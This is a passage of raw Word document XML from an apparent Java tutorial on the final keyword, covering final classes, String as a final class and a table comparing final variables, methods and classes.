        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> This will cause a compile-time error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDFB2A1" w14:textId="77777777" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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0800161"/>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SecurityManag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xtend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curityManag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CD47EC9" w14:textId="77777777" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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080016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annot inherit from final class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA5BAE" w14:textId="0BB25D16" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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0800161"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286D944" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0006045C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="47141A23">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A49D7C1" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">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Real-life Example: java.lang.String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5113BBFF" w14:textId="77777777" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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308934"/>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D200DEF" w14:textId="77777777" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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3089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tring class is final in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AD0AA3" w14:textId="6F0C1232" w:rsidR="00B84E7A" w:rsidRPr="00CE4B95"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308934"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29769CA1" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why? Because String is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable and heavily used</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Preventing subclassing avoids unpredictable behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466392B2" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0006045C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="693B8442">
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF9811" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">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Key Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C79C97A" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can create objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a final class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37330631" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot extend (subclass)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a final class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B815A78" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A final class </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can have final or non-final methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C78912C" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A class can be final, a method can be final, and a variable can also be final — but they have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different meanings</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33069BD0" w14:textId="199DB5A7" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Related Concep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27"/>
        <w:gridCol w:w="3960"/>
      </w:tblGrid>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="4CC6D49A" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F945321" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="00BC682D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Keyword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1845E74B" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="00BC682D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="3DE14AF4" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D7062B" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>final variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E145A85" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Value cannot be changed after initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="629F7B12" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07054AAF" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>final method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="710EDF75" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Method cannot be overridden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="1CB83B04" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B414D37" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>final class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="333BEB22" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Class cannot be extended</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07FA569A" w14:textId="4C61BCC6" w:rsidR="00661ECC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001967B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7A8145DA">
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C46BADD" w14:textId="77777777" w:rsidR="003507F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003507F3" w:rsidP="003507F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc196307495"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where can we use the final keyword?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="2AB01E3C" w14:textId="76B5F84B" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The final keyword in Java is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>restrict modification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — it can be applied to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>variables, methods, and classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184A8CE" w14:textId="606228F2" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Let’s break it down</w:t>
      </w:r>
      <w:r w:rsidR="007609FC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194CCBD8" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3C5787A2">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3234CB40" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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1. final Variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E662F6B" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prevents reassignment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
